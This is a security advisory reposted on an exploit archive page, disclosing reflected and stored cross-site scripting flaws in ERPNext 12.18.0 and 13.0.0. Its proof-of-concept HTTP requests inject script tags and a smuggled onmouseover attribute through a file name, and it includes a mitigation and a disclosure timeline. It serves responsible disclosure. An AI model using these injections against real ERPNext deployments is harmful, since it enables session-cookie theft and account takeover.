what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ERPNext 12.18.0 / 13.0.0 Cross Site Scripting

ERPNext 12.18.0 / 13.0.0 Cross Site Scripting
Posted May 11, 2021
Authored by Stefan Pietsch, Nick Decker | Site trovent.io

ERPNext versions 12.18.0 and 13.0.0 suffer from reflective and persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 699a6d07a77fc3e81b2deafe5caea2a355ca696143d694138925ef128a29180b

ERPNext 12.18.0 / 13.0.0 Cross Site Scripting

Change Mirror Download
# Trovent Security Advisory 2103-02 #
#####################################


Multiple XSS vulnerabilities in ERPNext 13.0.0/12.18.0
######################################################


Overview
########

Advisory ID: TRSA-2103-02
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2103-02
Affected product: ERPNext
Tested versions: 12.18.0 and 13.0.0 beta
Vendor: Frappé Technologies https://frappe.io
Credits: Trovent Security GmbH, Nick Decker, Stefan Pietsch


Detailed description
####################

Trovent Security GmbH discovered multiple Cross-Site-Scripting vulnerabilities
in the current software versions of ERPNext (13.0.0 and 12.18.0).
An attacker could leverage this attack to steal session cookies,
install a JavaScript keylogger and more.


1. Reflected XSS in _server_messages exception field
####################################################

When an API call causes an error the server sometimes sends back exception messages
containing the user input which is not sanitized.
This creates the possibility of reflected XSS in any API call/server function using "_server_messages".
This would be hard to exploit because we only found _server_messages exceptions
in API calls made by the application itself not the user.

Severity: High
CVSS Score: 7.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:L)
CWE ID: 79
CVE ID: TBD

Proof of concept
################

Sample request intercepted with Burp to inject JavaScript. Note that the JavaScript
is injected in "reference_name" to raise an exception:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


POST /api/method/frappe.desk.form.utils.add_comment HTTP/1.1
Host: sqlprodtest.local:1080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: e6532d5e7bef6360c9646d58e0940e8004820db8704ab3dad1d2d875
X-Frappe-CMD:
X-Requested-With: XMLHttpRequest
Content-Length: 157
Origin: http://sqlprodtest.local:1080
Connection: close
Referer: http://sqlprodtest.local:1080/desk
Cookie: sid=0dfe3b41ff7d0a368a4f28cea4f45ce41b2eadec833c5bc42105355e; system_user=yes; full_name=Administrator; user_id=Administrator; user_image=; io=Ly9MpKRfK_nrKpurAAAN

reference_doctype=User&reference_name=%3cscript%3ealert(1)%3c%2fscript%3e&content=xsstest&comment_email=Administrator


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



RESPONSE (removed the Stack Trace for better readability):

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


HTTP/1.1 417 EXPECTATION FAILED
Server: nginx/1.19.7
Date: Thu, 11 Mar 2021 14:23:05 GMT
Content-Type: application/json
Content-Length: 1894
Connection: close
Set-Cookie: sid=0dfe3b41ff7d0a368a4f28cea4f45ce41b2eadec833c5bc42105355e; Expires=Sun, 14-Mar-2021 14:23:05 GMT; Path=/
Set-Cookie: system_user=yes; Path=/
Set-Cookie: full_name=Administrator; Path=/
Set-Cookie: user_id=Administrator; Path=/
Set-Cookie: user_image=; Path=/

{"exc_type":"LinkValidationError","exc":"[\"Traceback (...)]","_server_messages":"[\"{\\\"message\\\": \\\"Could not find Reference Name: <script>alert(1)</script>\\\", \\\"indicator\\\": \\\"red\\\", \\\"raise_exception\\\": 1}\"]"}


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



2. Stored XSS everywhere where user input is stored inside of HTML tags
#######################################################################

The application does not sanitize escaped quotation marks (\").
This can be abused to escape the HTML attribute the input is stored in.
That allows the user to add new attributes like event handlers
and thus leading to stored XSS.
Our testing concluded that this issue is present in the entire application
the only requirement is that the input is being reflected
inside of an HTML tag not between them. It also can't be a linking
attribute like "href" because inside of them user input is escaped.
For example in combination with HTML injection through a comment,
a malicious user is able to modify his profile to steal cookies
from every user including administrators that view his profile.

Severity: High
CVSS Score: 8.2 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L)
CWE ID: 79
CVE ID: TBD

Proof of concept
################

Sample request where the file name contains the XSS code with the escaped quotation marks:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


POST /api/method/upload_file HTTP/1.1
Host: sqlprodtest.local:1080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Frappe-CSRF-Token: e6532d5e7bef6360c9646d58e0940e8004820db8704ab3dad1d2d875
Content-Type: multipart/form-data; boundary=---------------------------173872902410009950314171894076
Content-Length: 74566
Origin: http://sqlprodtest.local:1080
Connection: close
Referer: http://sqlprodtest.local:1080/desk
Cookie: sid=0dfe3b41ff7d0a368a4f28cea4f45ce41b2eadec833c5bc42105355e; system_user=yes; full_name=Administrator; user_id=Administrator; user_image=; io=o0Bglip9YmrzxZj9AAAX

------------------------------173872902410009950314171894076
Content-Disposition: form-data; name="file"; filename="user-enum.png\" onmouseover=\"alert(1234)\""
Content-Type: image/png

PNG
(...)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



HTML code snippet from erpnext-server.com/desk#List/File/Home.
The user is able to escape the context of the title attribute and
add an onmouseover event which triggers the JavaScript:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<div class="level list-row small">
<div class="level-left ellipsis">

<div class="list-row-col ellipsis list-subject level">
<input class="level-item list-row-checkbox hidden-xs" type="checkbox" data-name="a5ff65f666">
<span class="level-item ellipsis" title="user-enum.png" onmouseover="alert(1234)" "="">
<a class="ellipsis" href="#Form/File/a5ff65f666" title="user-enum.png" onmouseover="alert(1234)" "="">

<i class="octicon octicon-file-text text-muted" style="width: 16px;"></i>
<span>user-enum.png" onmouseover="alert(1234)"</span>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

To mitigate this vulnerability, we recommend to always escape quotation marks.


History
#######

2021-03-08: Vulnerability found
2021-03-12: Advisory created and vendor contacted
2021-03-22: Vendor replied that they request CVE IDs after a fix is released
2021-04-19: Vendor informed about planned disclosure date (2021-05-11)
2021-05-03: Vendor contacted, asking for status
2021-05-07: No reply from vendor, vendor contacted again
2021-05-11: Advisory published
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close